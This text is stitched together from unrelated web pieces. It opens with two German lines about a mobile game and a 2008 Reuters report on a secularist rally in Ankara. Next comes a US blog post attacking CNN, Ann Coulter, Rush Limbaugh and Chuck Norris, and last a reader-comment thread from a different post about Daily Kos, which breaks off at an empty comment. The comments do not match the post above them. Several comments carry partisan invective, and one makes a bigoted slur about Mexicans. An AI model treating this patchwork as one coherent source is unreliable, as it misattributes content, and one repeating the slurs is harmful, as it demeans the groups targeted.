Wird es ein so großer Hit wie Clash Royale oder Clash of Clans sein ?
Ich freue mich auf Ihre Kommentare in den Kommentaren , liebe Grüße !
ANKARA ( Reuters ) - Thousands of secularist Turks rallied in Ankara on Saturday against the ruling AK Party , which is facing a high court challenge by a prosecutor who wants it shut down for alleged Islamist activities .
Slideshow ( 6 images )
Demonstrators waving red Turkish flags and pictures of Mustafa Kemal Ataturk , founder of modern Turkey , chanted slogans against the AK Party and the European Union , criticized by many Turks for perceived meddling in Turkey ’s domestic politics .
Turkish TV put the numbers at roughly 20,000 people , with many coming from faraway cities .
The Constitutional Court last month agreed to hear the case calling for 71 AK Party officials , including Prime Minister Tayyip Erdogan , to be banned from politics for five years .
“ It must be closed down , the danger is that great , ” protester Aysun Ozarman , 55 , said of the AK Party .
Ozarman works in tourism and traveled from the southern province of Antalya to attend the protest near Ataturk ’s mausoleum .
The case is the latest escalation of tension between the religious - leaning government and a secularist establishment made up of judges , army officers and professors .
It comes soon after the AK Party moved to lift a ban on headscarves in universities , an issue also being challenged in court .
The AK Party , which has presided over strong economic growth and democratic political reforms since sweeping to power in 2002 , denies accusations that it has an Islamist agenda .
Officially for “ national sovereignty ” , the protest came ahead of National Sovereignty and Children ’s Day on April 23 .
Protesters also objected to the EU and its support for the government .
The government is pushing for Turkey to join the bloc , but the EU ’s popularity has fallen among the public since the start of accession talks in 2005 .
European Commission President Jose Manuel Barroso was in Istanbul on Saturday at the end of a three - day trip , during which he urged the Turkish court to apply European standards in the case against the AK Party and called for democratic reforms .
“ We do n’t want the EU interfering , ” said Sibel Varol , a 35 - year - old housewife who came to protest from Istanbul .
“ The EU is not our master . ”
Thank you , CNN , for continuing to elevate the discourse in this great land , and proving that , while you may not be the most trusted name in news , you can certainly take any element of news and turn it into a journalistic car crash worthy of attention all on its own .
Ann Coulter converses with CNN's Glenn Beck ...
BECK : You know what ?
You know what ?
As uncomfortable as you -- as uncomfortable as you are with Hillary Clinton or I am with John McCain , you are with John McCain , it is not somebody who says , " Hey , I 'm going to sit with leaders of Iran and Syria and Cuba and Venezuela who hate us .
And by the way , my record on judging people is I did n't think this hatemonger was a hatemonger for 20 years . "
COULTER : Right , right .
And calls -- and obviously hates the United States .
This is part of the traitor wing of the Democratic Party .
And I guess the question is : Is Obama a Manchurian candidate to normal Americans who love their country -- and he secretly agrees with the Weathermen and the Reverend Wright faction ?
Or is he being the Manchurian candidate to the traitor wing of the Democratic Party ?
And he , I guess , has to take the position now that , " No , I was just trying to hoodwink the traitor wing . "
Ah , yes , a " Manchurian candidate " to the " traitor wing " of the Democrats .
Because really , there 's absolutely nothing you can't vomit up onto the screen that would fall below whatever standards of integrity CNN once claimed to have .
Nutjob right wing radio host with extended history of saying vile , unconscionable things ?
Hell , let 's make him one of our most promoted talking heads !
But wait -- that might not be as insulting to the American public as we could be , so let 's let him invite people like Ann Coulter on to talk with him and assert that both a party 's presidential candidate and an entire segment of the population might be traitors .
That 's certainly worth the broadcast might of a supposed news network , is it not ?
Mind you , I 'm not entirely sure when suggesting the mere possibility of diplomatic talks became an act of high treason , given that selling weapons to people that hate us sure does n't count , and violating the Constitution on a daily basis does n't count , and lying to the American people frequently and directly does n't count , but what the hell do I know -- I 'm not CNN .
Maybe they should book me , and I can explain in great detail how Glenn Beck got syphilis from his frequent trysts with Kim Jong Il , and as long as I have either a flag or a cross pinned to me I should be able to get away with pretty much anything , yes ?
Of course , CNN is not the only provider of supposed " political " figures behaving badly .
Rush Limbaugh 's wistful hopes for violence at the Democratic National Convention are already been much - noted , though to absolutely no effect ...
We need the American left -- and this is another great thing about Operation Chaos ; nothing to do with my ego .
We need as many ignorant Americans to wake up and find out exactly who the modern - day Democrat Party is as dominated by the far left in this country .
We need that to be seen .
Now , I am not inspiring or inciting riots .
I 'm dreaming .
( singing to the tune of White Christmas ) " I 'm dreaming of riots in Denver . "
" Operation Chaos " is Rush 's name for his continued urging of callers to create " chaos " in the Democratic party by pretending to be Democrats and doing things to hurt the Democrats , so every single thinking human in America , even Rush 's own dim - as - a - candle - in - an - oxygen - deprived - room callers who called to chastise him , took his remarks to be inspiring or suggesting riots .
Rush is , of course , known for such speech , so it barely makes news .
But he counts even the Vice President of the United States among his frequent guests , and not one of them has been asked to denounce the corpulent , hoping - for - violence blowhard .
Why should they ?
And let us examine the fine specimen of Republican surrogacy , Chuck Norris , whose religiously motivated , godfearing promotion of the candidacy of Republican Mike Huckabee was the subject of much attention .
In his latest commentary , Norris has an explicitly conservative " solution " to illegal immigration :
If these solutions do n't stop the tides of illegal flow in and out of our borders , a friend of mine has a Texas - tough alternative and answer to replace the government 's virtual fence failure .
In fact , he says , we do n't need a security fence at all .
All we need to do is to post signs and position manned trucks at key points , just like our government does at Area 51 , the top secret militaryairfield in remote central Nevada , around which there are no fences or walls .
There is never a breach or unwanted border crossing there , at least that we hear about !
And why ?
Because the boundary sign reads and is never questioned , " Warning : Use of deadly force authorized . "
Now , there once was a time when using your political column to suggest the government execution of ethnic types found on the wrong patch of land was considered acceptable behavior -- oh , who am I kidding , it has always been acceptable behavior , whether in Germany or here -- but surely , one can marvel at the tight embrace of the Republican Party with those that promote such notions .
Even if they are washed - up TV action stars who leaven their calls for final solution with appropriate Christian rhetoric .
I realize that , since Huckabee is out of the race , we need not concern ourselves with his own surrogates -- in the vast wasteland of American journalism , thousands and thousands of reporters and pundits strong , we only have time to focus on one surrogate at a time , and the rest will have to be ignored -- so I can only presume all other Republicans have already denounced their very visible supporter .
Nothing 's quite as impressive as having a nationwide multiweek media pants - crapping over some guy 's ex-minister saying mean things , then demonstrating vividly to the world that hoping for violence , accusing the other party of treason , or suggesting organized ethnic murder are all firmly in the realm of reasonable Republican discourse .
So firmly in the realm of reasonable discourse , in fact , that they hardly bear remarking upon ... except by those devious liberals with their possibly treasonous ability to hold multiple things in their minds at one time .
READER COMMENTS ON
" Writers ' Strike at Daily Kos ? Try a Readers ' Strike ... "
( 77 Responses so far ... )
COMMENT # 1 [ Permalink ]
... naschkatze said on 3/15/2008 @ 1:48 pm PT ...
I 'll give Markos Moulitsas and The Daily Kos a pass on this one .
I have been critical of his attempts to get into the MSM and never was a member there because the site was just a little too big for me , kind of like the Catholic church .
But I read one of the " striker 's " , Taylor Marsh 's , blog now and then and have to say that it 's the proverbial pot calling the kettle black .
I have never read a more vitriolic and one - sided pro-Clinton blog , and I have tried to comment there and have been shut out .
I do not even know if Ms. Marsh is paid by the Clinton campaign ; if so , she should issue a disclaimer .
I agree with Kos on this one that the blogosphere is enormous and let them go elsewhere if they want .
Actually I wish Arianne Huffington would send her packing too .
COMMENT # 2 [ Permalink ]
... Bees said on 3/15/2008 @ 2:13 pm PT ...
I have been going to the Daily Kos every day since 2004 .
I deleted the bookmark today , and I wo n't be back .
That site has become a cesspool of extremist hate against a democratic candidate .
The people at DKos have treated Hillary Clinton with such disdain and disrespect that it borders on the obscene .
I find it disgusting and embarrassing .
Markos should be ashamed that he has allowed and even encouraged the site to go in this direction .
How does this active loathing of a committed democrat help democrats ?
The simple answer is , it does n't .
Markos does n't realize it yet , but his site is through .
Once the hype of the primaries is over , he will see his traffic drop off dramatically .
He has lost all respect from moderate democrats and independents , and his site has now become a caricature of left - wing hatred .
It will become more and more radical and therefore distrusted as a source of information for democrats .
How sad for DKos .
COMMENT # 3 [ Permalink ]
... campskunk said on 3/15/2008 @ 2:36 pm PT ...
there was a LOT of ugly stuff that precipitated this walkout .
administrators on Kos have stood by while Obama supporters tried to find out real life information on Hillary supporters - their real names , where they lived and worked , etc. the FAQs say this is a bannable offense , yet the people who did this are still there , posting away .
hmmmm ... when i protested about someone commenting about a " death wish " in a thread about hillary , the administrators warned me , not the person posting the secret service bait !
basic legal liability considerations have been ignored by the administrators at Kos in their zeal to support obama .
i hope nobody gets hurt as a result of this , but it's not a safe place to post anymore the way things are now .
COMMENT # 4 [ Permalink ]
... what now toons said on 3/15/2008 @ 2:57 pm PT ...
The New boss , same as the old boss , is a tune I sure hope I wo n't be singing in the years to come .
Kos has every right to support whom he wants to win in these primaries , however , he risks the destruction of the very thing he created by playing favorites in his dissemination of information .
That is not democratic , and is equally Orwellian as the Bush administration he rails against .
I would urge Kos to reconsider his actions and make corrections to keep equality on his board , but as I said , it is his board , and his to feed or starve .
As a Political cartoonist who is more radical than most in a desire for progressive change find similar discrimination on many boards who ignore my work and pretend I am not out there and wo n't ad links to my work among other political cartoonists , even though i am a prof .
see my work and make up your own mind .
www.whatnowtoons.com
cartoons for the coming progressive age .
COMMENT #5 [ Permalink ]
... GWN said on 3/15/2008 @ 3:05 pm PT ...
Brad , you know I love ya , you , Kucinich , Michael Moore , Palast , and Scott Ritter are my US heros ( Feingold was another until he was against impeachment ) but please let this go .
Rise above it , time will take care of Marcos .
Readers , most progressives anyway , are smart enough to read between the lines .
If he attacks you yes I agree , attack back .
This is something I observe from across the border .
Too much " in " bickering .
I also see since reading US blogs that you are a very competitive nation , even in little things .
but ... If Hillary gets nominated I will begin digging the moat , all along the border from Niagara Falls , west to BC .
COMMENT #6 [ Permalink ]
... commontater said on 3/15/2008 @ 3:06 pm PT ...
I 've been a long - time lurker here but I 've decided to come out just to say I 've been to Kos many times and stopped going there , except occasionally just to see if things have changed .
Sadly , that blog will turn a lot of people off the " progressive " wagon before election day .
That 's the price any blogger pays for being rabid instead of moderate , myself included .
So , I just want to reiterate that the best way to get your distaste of Kos across is to just not go there .
{ Ed Note :
You just forgot the " dot " in your dot com .
It 's fixed now .
You should fix it in your comment box .
-- 99}
COMMENT # 7 [ Permalink ]
... Brad Friedman said on 3/15/2008 @ 3:25 pm PT ...
GWN - For what it 's worth , I tend to only blog items for which I may be able to add something .
In this case , I am able to add to " Alegre 's " call for a writers strike by offering my insight as a blog owner that it's not writers striking that hurt , but readers striking .
In this case , I do n't even necessarily advocate for or against such a strike , but rather offer that information to those who do , if useful .
My position on the behavior of Markos and a number of his front - page contributors is well known .
I respect my readers enough that they can decide for themselves what , if anything , they wish to do ( or not do ) in response .
For the record , I do n't wish any of them , or the blog as a whole , any ill , nor do I feel competitive with them .
To the contrary , I think the voice they 've gained is an important one , and therefore , I hate to see it abused , used irresponsibly or self - destructively as I have seen occur over there now for far too long .
I hope Markos will listen to the messages that good folks are trying to send him .
If he does n't , of course , there 's nothing that I can do about that , even though it would continue to be a pity .
COMMENT #8 [ Permalink ]
... Floridiot said on 3/15/2008 @ 4:49 pm PT ...
The difference to me about certain blogs is evident .
The Conservative ones seem to be more authoritarian in the way they handle their posters .
The Liberal ones are more open to the new ideas that emerge , but some do become more dictatorial in their way of handling things .
I guess blogworld imitates real life history ( the human condition ) , does n't it .
COMMENT #9 [ Permalink ]
... Agent 99 said on 3/15/2008 @ 5:27 pm PT ...
Yuh , Flo , we continue to blow every opportunity for transcendence we ever get .
One thing I value very highly here is Brad 's continued efforts to keep those opportunities coming ... his failure to give up .
COMMENT # 10 [ Permalink ]
... dr. elsewhere said on 3/15/2008 @ 5:33 pm PT ...
brad , i stopped visiting the kos long ago , when he refused to even consider the possibility that the ' 04 election may have been robbed .
he was so pompous and dismissive , even mocking , it turned my stomach .
occasionally someone will quote or link to the site , and more often than not i just ignore it .
when i have n't , nothing has impressed me .
the entire enterprise just seems so grossly over - rated .
cannonfire addressed markos ' latest inflammatory madness , the claim that the hillary campaign used intentionally doctored videos of obama to make him look darker and broader in the face .
i.e. , more black .
cannonfire took that notion apart brilliantly , but did markos back down ?
oh no , did n't even budge .
but i fear the meltdown described at dkos is quite the epidemic these days .
sigh .
so much at stake , and everyone 's at a fever pitch .
we must all really strive to keep even keels and not allow ourselves to get fired up .
it serves no one but our adversaries to lose our heads .
COMMENT # 11 [ Permalink ]
... Floridiot said on 3/15/2008 @ 5:36 pm PT ...
Yep , that 's why I continue to hang around
COMMENT # 12 [ Permalink ]
... socrates said on 3/15/2008 @ 5:50 pm PT ...
Good people at Kos should leave and try to find greener pastures .
That is a compromised website .
http://rawstory.com/comments/46357.html posted by anonymous i've given up on the dem blogs almost entirely .
it is as if dems are determined to give mccain the presidency - how did that happen ?
the corpmedia game you all .
the trolls were their weapon .
off - topic : any chance we could get new windows when clicking on links ?
thanks .
COMMENT # 13 [ Permalink ]
... youngharry said on 3/15/2008 @ 5:59 pm PT ...
I read many blogs daily , and I can only say that the vitriol I find on the various sites against Hillary is only AFTER Hillary , or one of her Surrogates , post something that is so out of line against Obama , that it truly NEEDS ATTACKING .
ENOUGH IS ENOUGH .
STOP HILLARY AND GERALDINE , ETC . , FROM NEEDLESS ATTACKS THAT DON'T LEAD TO POLITICAL DISCOURSE , AND THE ATTACKS AGAINST HILLARY WILL STOP .
IT 'S SIMPLE ---FOR EVERY ACTION THERE IS A REACTION ..
JUST STOP IT !!!
COMMENT # 14 [ Permalink ]
... Floridiot said on 3/15/2008 @ 5:59 pm PT ...
Elliots Mess Palast Scroll down for audio , it ' better when Greg tells it .
Kinda like dad reading you a scary bedtime story .
COMMENT # 15 [ Permalink ]
... Floridiot said on 3/15/2008 @ 6:33 pm PT ...
COMMENT # 16 [ Permalink ]
... Agent 99 said on 3/15/2008 @ 6:55 pm PT ...
That 's redundant , Flo. Capitalism is predation .
And that picture is the perfect expression of it .
The few who benefit from it , very unfortunately , do n't let themselves understand that their benefit comes directly at the cost of the many suffering from it .
COMMENT # 17 [ Permalink ]
... larue said on 3/15/2008 @ 9:30 pm PT ...
Maybe the anti Clintonista support is a sign of the number of those for Obama , and opposing Shilary .
OVERWHELMING NUMBERS ON THE BLOGS !!!
Two OTHER blogs obviously shillin for Shil have lost readership .
It pretty much tells the story , no ?
Cuz , there are some SERIOUS things to consider if Clinton GETS the nomination .
One being , she 's unelectable and we are in for four more or 8 more years of Republican Rule for the 1 % .
I do n't know why this debate is still even legit .
But let the Clintonista 's howl like the blame monkey 's they are .
I think Ferraro , and Teh Shil , have proven their victim point of view .
We should n't be electing self claimed victims to our highest office , methinks .
COMMENT # 18 [ Permalink ]
... Radiowalla said on 3/15/2008 @ 10:13 pm PT ...
I said Aurevoir at DKos even before the Writers Strike was declared .
The site used to be a vital community of progressive activists and now it is nothing more than a viper 's tangle of crazed Obama supporters who will brook no alternate views .
The vitriol and personal attacks are beyond the pale .
COMMENT # 19 [ Permalink ]
... TomR said on 3/15/2008 @ 10:13 pm PT ...
While this references DKOS , I think this Don Siegelman article is worth the read : http://www.crooksandliar...-all-roads-lead-to-rove/
- Tom
COMMENT # 20 [ Permalink ]
... cdo said on 3/16/2008 @ 12:23 am PT ...
Hi Brad , saw a link at noquarter , and thought i'd stop by .
I too zapped my bookmark for DKos a couple months ago , as well as several others sites .
Have n't missed the venom a bit i must say .
It has been nice discovering so many new , well run sites that are reaping the advantage of the DKos ( et al ) bleed out .
There is always a silver - lining I suppose
Peace !
COMMENT # 21 [ Permalink ]
... pro choice lib said on 3/16/2008 @ 5:34 am PT ...
If you think the primaries are bad around DKos , wait until after the election when the real ego's emerge .
When someone writes a diary wanting to restrict who will get to write a post because they can't take the LOW QUALITY OF THE WRITING .
I have noticed also that it is a Dem politician dumping ground .
They all go atwitter when a pol posts a diary and it immediately gets uplisted .
This is great for pols who are looking for quick small donations , e-mail lists , and ego stroking no matter what the issue .
I quit going there months ago , not because of the primary venom which is a pain , but because there is nothing new .
It 's a forum where people share information .
If what they post is no longer useful then stop clicking .
COMMENT # 22 [ Permalink ]
... Dredd said on 3/16/2008 @ 6:00 am PT ...
dkosanostra is a drag ... afraid to consider some of the bushie regime 's gretest nightmares .
Plus dkosanostra is fatally infected with the deibold faith / election religion and is even evangelical about it .
Nutso .
COMMENT # 23 [ Permalink ]
... Big Dan said on 3/16/2008 @ 7:49 am PT ...
I never go there , because I think the site stinks .
I have no interest to go there .
COMMENT # 24 [ Permalink ]
... Annie said on 3/16/2008 @ 9:04 am PT ...
Aweakness of that type of blog is its emphasis on the people instead of prinicples and policy .
For those of us interested in learning about and discussing substantive issues and policy , there has n't been a meta venue .
My own experience there was to write substantive issues and policy related posts and to be personally attacked whenever the argument was n't foursquare aligned with the Dem. party talking points .
Very few people ever commented on the substance of my posts , and comments usualy stayed in the shallow end of the pool .
The blog served a purpose in attracting people to politics who had n't before had a venue for participation .
But it 's already a dinosaur , and it's hastening its own extinction with the ad hominem nature of participation and administrative oversight .
As many have noted , it 's more often the diaries which write to the personal and unsubstantive , that are widely read and recommended , while the substantive and well - constructed diaries on issues , policy and oversight are relegated perhaps to the rescued pile , but are most likely disappeared quickly to die a death of the unread .
I hope tha the next wave of group blogs will emulate a hive behavior more along the lines of a Talking Points Memo structure .
Substantive , issues and policy focused with a much longer range - and broader ranged view .
I am seeking group blogs which remain true to vigorous research , civil discourse , logical argument and substance .
I want to read essays by people who are passionate and ethical about their interests .
That eliminates Daily Kos , and I 've turned my attention elsewhere with no regrets .
COMMENT # 25 [ Permalink ]
... frankdawg81 said on 3/16/2008 @ 9:36 am PT ...
Frankly I am sick of many blogs that have become little - jonny - one - notes for either candidate .
I stopped reading huffpo some time ago because of the relentless Clinton bashing & more recently stopped reading the great grandfather of liberal blogs , bartcop , because of the relentless Clinton boosterism .
It is tiresome folks , just tiresome - neither of these two descended from heaven with golden tablets .
Personally I believe the front page of kos is better balanced than many ( I have been ignoring the boosters individual blogs so maybe I have saved myself from the agita many of you are suffering from .
We crossed a lie some time ago when we could easily repair the damage online backers of either candidate have caused , sadly .
The candidates have been far better than a few hotheads posting blogs .
That is with one notable exception : Clinton crossed an unforgivable line when she claimed McBush is more qualified than Obama to be CinC .
McBush is less qualified than ANY of the Dem contenders , including Gravel .
That was not smart , it was not fair and it is not forgivable .
I would , however , vote for her in November if that was the choice .
On line we need to remember who the real evil empire is , it is not kos , or brad or BHO or HRC - it is the RNC and whatever brain damaged excuse for a candidate they provide .
Boosters have gotten carried away with the notion that they see truth others can't - that is a good working definition of insanity .
People of good faith should agree that we support candidates for our own reasons and other do so too .
We need to respect each other just as we want out opinions to be respected .
And that concludes todays sermon .
COMMENT # 26 [ Permalink ]
... Jeff Blohnstein said on 3/16/2008 @ 9:37 am PT ...
They should call it , Daily Cops .
Most of the posters devote their effort to dragging down anyone who tries to inject an original opinion .
COMMENT # 27 [ Permalink ]
... dr. elsewhere said on 3/16/2008 @ 9:50 am PT ...
here here , annie !
how i wish dailykos were the only site diving off the cliffs into irrationality and fury , but alas , there seem to be more than one .
what interests me is that these rabid , vicious , tyrannical , mywayorthehiway , o'reilly clones fail to recognize how they have become those very characters they 've spent years lambasting as ' rightwingnuts ' .
well , we now have our own growing - sadly - crop of leftwingnuts .
and we would do very very well to learn from history and vocally , actively distance ourselves from them immediately while also addressing their destructive and counterproductive nature and how and why to correct it .
no matter how ' right ' any individual might be on a certain point , NO ONE is going to hear it , much less be swayed by it , if it is screeched and pounded down our throats by a dictatorial echo chamber .
and of course the screeching dictators inevitably lose their capacity to listen to reason because they 're shouting so loudly .
and of course because they are so ' right . ' not only must we refuse to enable those sites by refusing to visit them , we must also work diligently to maintain the discourse wherever we are civilized and respectful , always .
so glad you guys are out there , and that brad fosters such civility .
it 's the only way any real differences can be made .
life 's just too darn short to alienate anyone ; we need all the friends we can get , and ultimately , we 're all in this together .
COMMENT # 28 [ Permalink ]
... Michelle said on 3/16/2008 @ 10:32 am PT ...
frankdawg81 said : Clinton crossed an unforgivable line when she claimed McBush is more qualified than Obama to be CinC.
McBush is less qualified than ANY of the Dem contenders , including Gravel .
Way to spin , that 's NOT what she said .
In Fort Worth Hillary responded to a question regarding national security experience .
Her reply : “ I think you 'll be able to imagine many things Senator McCain will be able to say , ” she said .
“ He ’s never been the president , but he will put forth his lifetime of experience .
I will put forth my lifetime of experience .
Senator Obama will put forth a speech he made in 2002 . ” A flippant remark ?
Yes , but in no way giving McCain any credit beyond what she believes he will say .
Context is a bitch , ai n't it ?
On March 6 , in New York Hillary said : “ I think that since we now know Sen .
McCain will be the nominee for the Republican Party , national security will be front and center in this election .
We all know that .
And I think it ’s imperative that each of us be able to demonstrate we can cross the commander - in - chief threshold , ” the New York senator told reporters crowded into an infant ’s bedroom - sized hotel conference room in Washington .
“ I believe that I ’ve done that .
Certainly , Sen. McCain has done that and you ’ll have to ask Sen.
Obama with respect to his candidacy , ” she said .
Maybe Joe Lieberman will give Obama some tips .
He is his mentor after all .
;o}
COMMENT # 29 [ Permalink ]
... UncleEm said on 3/16/2008 @ 10:33 am PT ...
I stopped visiting dKos because , irrespective of their politics , readers / diarists were not posting substantiated facts .
Opinions are presented ( often as fact ) consisting mostly of vitriol and invective .
I found little that was helpful as I searched outside the MSM for " real news " and information about what is really going on in our world .
COMMENT # 30 [ Permalink ]
... HelenWheels said on 3/16/2008 @ 10:54 am PT ...
I stopped visiting DailyKos over a year ago and it sounds like it 's gotten much worse .
The second I found out they do n't ALLOW comments or diaries about 911 conspiracy theories blew my mind .
So they do n't like election fraud as a topic , either ?
If they do n't allow all topics , whether or not Markos likes them , then they are not " liberal " in any sense of the word .
The Hillary bashing is not new .
It 's been going on since last year .
I 'm not surprised to see it 's ramped up .
It 's sort of reflective of the mainstream media , no ?
I mean , they are merciless with her .
It disgusts me , and I 'm not even a Hillary fan .
I think DailyKos sucks , really .
COMMENT # 31 [ Permalink ]
... newjesustimes said on 3/16/2008 @ 11:32 am PT ...
KOS is no less a tool of the elite than the New York Times .
All these politicians smell like rot because the political process is so rotten .
How about a transparent open source voting system accessible online , where information about issues and platforms will not be limited by the amount of money spent by a candidate or party .
Democracy anyone ?
COMMENT # 32 [ Permalink ]
... James Gawthrop said on 3/16/2008 @ 11:45 am PT ...
I have drifted away from Kos for awhile , but I 'm sure I will be back frequently .
I would rather jump off a roof than vote for Hillary Clinton .
She is a complete , 100 % phony , bought and paid for by the drug , medical insurance , and oil lobbies .
The Clintons are addicted to power , which they view as a sort of entitlement .
If it has escaped your attention so far , the Clintons are A LITTLE corrupt !
Given the sort of negative brochures I received about Obama here in Ohio , I feel her supporters here have no grounds whatsoever to snivel .
I hope I never have to hear the strident , scalding sound of that nasty woman 's abrasive voice ever again .
I can hardly wait to see the back of her .
You know , it 's funny .
After years of waking up in the morning after nightmares about George W. Bush , I find myself waking up after nightmares about Hillary Clinton .
The country - which is in very bad shape - simply cannot withstand four years of her and good old Bill .
Thank you .
COMMENT # 33 [ Permalink ]
... shimez said on 3/16/2008 @ 11:50 am PT ...
Dkos is not alone .
and is not much worse than places like antiwar.com - A CATO Institute project , undisclosed , that uses Nazi tactics .
Matt Barganier posted the employer of a blogger he disagreed with along with an admonition for his readers to contact the guy 's boss and get him fired !
Blacklisting beyond his blog - with advoctes like this - who needs government ???
Even some of the actual brownshirt sites havent pulled THAT one ( yet ) .
Authoritarianism is rampant on the web and its not limited to left or right .
COMMENT # 34 [ Permalink ]
... Norma W. said on 3/16/2008 @ 12:11 pm PT ...
Writers who are strike .
Any blogger who strikes Daily Kos has joined me your reader .
Reader on strike .
I am also very upset with Air America 's Randi Rhodes especially , then David Bender , John Elliott , Richard Greene , and sometimes Sam Seder .
How dare they tell me who to vote for especially Randi .
I hate it when they say we have two great candidates , but you know Hillary is a this or a that .
Shameful !!!!!
I have stopped podcasting Randi 's show and I paid to be a premium member .
She uses her entire 3 hours to bash Hillary .
Crooks and Liars is trying to stay out of the fray , but TPM is in the fray .
We Democrats helped liberal talk shows , and liberal blogger to gain success .
Why are they pushing for us to vote for their candidate ?
Who told them they had a right to tell us who to vote for .
Who is bringing this discourse into our election , them .
Hillary has been hit hard by Democrats , and the media .
Norma
Bakersfield
COMMENT # 35 [ Permalink ]
... charlottemom said on 3/16/2008 @ 12:24 pm PT ...
If you do n't like the content , there is a simple thing to do --- DON'T GO !
I 'm agnostic on DKos but Marcos did correctly say The internet is a big place .
As an antiwar non-party affliated poster / lerker , I 've been frustrated with dKos , but it 's quite interesting that anti-Hillary attitude on certain blogs is what 's captured the MSM attention .
Hmmmm Hillary lovers go back to Hillaryis44 , dKos is a grassroots activist site and the antithesis of Billary campaign's MO
COMMENT # 36 [ Permalink ]
... gtash said on 3/16/2008 @ 12:34 pm PT ...
I have also quit viewing the dKos site .
During the Edwards campaign , they were hostile to Edwards supporters .
Edwards had people posting diaries on Kos and then appealing for help voting them up on the Edwards site just to be seen or heard .
I suspect this happens alot for anybody trying to be seen or heard , and the " voting " system can operate effectively as a censor as much as it can " quality control " .
dKos is so big , I think the " vote - up / down " idea is n't really feasible .
I guessed that when they also started posting " Diary Rescues " .
A " diary " is a diary whether it is a mundane set of observations or a rant .
When you write as a blog , you adopts an editorial voice .
dKos is trying to do both and it is unwieldy .
COMMENT # 37 [ Permalink ]
... Nancy said on 3/16/2008 @ 12:39 pm PT ...
Yes , I quite them long ago ... there are nothing but subversives , illegal Mexicans , drug dealers , and bigots there .
There is nothing even remotely democratic about them .
Markos would n't even let me post a blog there .
Tried to delete my info there and they would n't let me do that .... wonder if I can sue ?
They really are anti-American !
COMMENT # 38 [ Permalink ]
... socrates said on 3/16/2008 @ 1:24 pm PT ...
COMMENT # 33
... shimez said on 3/16/2008 @ 11:50 am PT ...
Dkos is not alone .
and is not much worse than places like antiwar.com - A CATO Institute project , undisclosed , that uses Nazi tactics .
Matt Barganier posted the employer of a blogger he disagreed with along with an admonition for his readers to contact the guy 's boss and get him fired !
Blacklisting beyond his blog - with advoctes like this - who needs government ???
Even some of the actual brownshirt sites havent pulled THAT one ( yet ) .
Authoritarianism is rampant on the web and its not limited to left or right .
How is antiwar.com a Cato Institute project ?
I went to the search engine and could only find attacks on antiwar.com which were linked to the Cato Institute .
I see accusations here with no links .
To paraphrase , the kicker is that there are extremes on both the left and right .
The truth is that progressives have become marginalised by the astroturfing firms .
Such forces are worried that we the people are gonna figure out how to interact with facts and dignity .
They are afraid that a critical mass of awareness is advancing despite their manipulations .
Where disinfo is not allowed , there is a greater chance for good people to associate and work together .
The odds are then better that consensus can be reached , and that strategies can be implemented with the goal being to save the planet from warpigs .
COMMENT # 39 [ Permalink ]
... antidense said on 3/16/2008 @ 1:33 pm PT ...
If you do n't like DKos , then do n't go there .
It 's that simple .
Make your own site for Pete 's sake .
I do n't hear you guys complaining about being shut out of Freep or town hall .
Plus , you can't call everything you agree with unbiased and everything you disagree with as biased .
Hillary supporters :
Will you please stop taking every criticism of Hillary personally or as evidence some vast sexist , reverse - racist conspiracy to keep women down ?
Ever thought the criticisms of Hillary might actually be valid ?
And that Hillary actually does have more to criticize than Obama ?
IT 'S NOT BECAUSE SHE'S A WOMAN , IT'S BECAUSE SHE'S HILLARY !
Address the criticisms , tell us why you think they are not important rather than lashing out at us as cultists , reverse - racists and sexists .
Characterizing us and calling us names simply undermines the discussion ( same for Obama supporters . )
COMMENT # 40 [ Permalink ]
... socrates said on 3/16/2008 @ 1:34 pm PT ...
# 35 " dKos is a grassroots activist site " Kos has been astroturfed as being such .
Newbies and fence sitters might want to engine search Kos and cia .
That place is part of a " controlled opposition . "
If it was for real , there would be an outcry there about the illegal and immoral war .
If it was legit , it would n't be calling those concerned with election integrity " conspiracy nutters . "
DailyKos is toast .
As time goes on , people will inevitably see the place for what it is , a rightwing website in progressive clothes .
COMMENT # 41 [ Permalink ]
... Hilarity with one L said on 3/16/2008 @ 1:39 pm PT ...
It 's interesting to see the non-progressive section of the Democratic party batter each other with vitriol , or spatter each other more aptly .
Just try reading ThinkProgress where no discussion of Democrats is tolerated at all .
Instead one can only batter and spatter Republicans .
As a true progressive I have to say DailyKos has no bearing on anything material to the election .
It 's just big egos trying to out do each other .
So spatter on .
No one really cares and it really does n't matter .
Obama is n't much better than Clinton , but he 's newer , and that is the only avenue of hope .
Hillary is just more of the same corruption .
Obama 's corruption will eventually get old , but maybe , just maybe , the people can get some relief from the ongoing destruction of our economy and of course relief from the Iraq war .
Will Obama end the war ?
Probably not .
What will end the war is the destruction of the US economy .
So maybe Hilary should win , or McCain , thus hastening the demise of the Country , and thereby the end of the empire .
It 's hard to know what one should do in these circumstances , but caring about the squabbling between competing wings of the imperialist Democratic party is not among my choices .
COMMENT # 42 [ Permalink ]
... Chris said on 3/16/2008 @ 2:09 pm PT ...
Daily Kos , is that a blog site ?
Never heard of it .
COMMENT # 43 [ Permalink ]
... Floridiot said on 3/16/2008 @ 3:15 pm PT ...
I am not ashamed , I am a Liberal !!!
COMMENT # 44 [ Permalink ]
... Floridiot said on 3/16/2008 @ 3:17 pm PT ...
... a proud Socialist Liberal at that
COMMENT # 45 [ Permalink ]
... Floridiot said on 3/16/2008 @ 3:26 pm PT ...
Good news !!!
My brother - in - law , a lifelong Puke , called me yesterday to tell me I was right all along !!!.
He went so far as to say ... get this ... that we have to go to a Socialist Government !!!
He sees now that energy , Corps , stock market and utils have to be regulated , and that programs have to be put in place to help people that fall through the cracks !!!
I 'm stoked now
COMMENT # 46 [ Permalink ]
... Agent 99 said on 3/16/2008 @ 3:30 pm PT ...
Flo !
THAT SO SERIOUSLY ROOOOOOCKS !!!!
COMMENT # 47 [ Permalink ]
... Floridiot said on 3/16/2008 @ 3:52 pm PT ...
99 , he -he And he also said that unions have to be re organized , tariffs put in place , that NAFTA , CAFTA and GATT have to be repealed , that we need socialized medicine and that ... gulp ... taxes have to be raised for the better good of society .
I was elated that he woke up to say the least and told him that he was never really a Republican at all , he was just misled by the CMSM .
COMMENT # 48 [ Permalink ]
... Agent 99 said on 3/16/2008 @ 3:58 pm PT ...
Well , when he falls of the turnip truck he sure does it in a big way !
Are you sure he does n't have a brain tumor ?
Actually , I have a friend who is a staunch Republican , but keeps hollering about there being no local , state or federal services to help poor and handicapped people !
I can holler till I 'm blue that Job One for Republicans is to prevent that stuff , but it never sinks in .
She 's otherwise very intelligent and I have come to think she just has synaptic malfunction at the point where her party affiliation is lodged in her brain .
She 's one of the most liberal people I know .
Very strange .
COMMENT # 49 [ Permalink ]
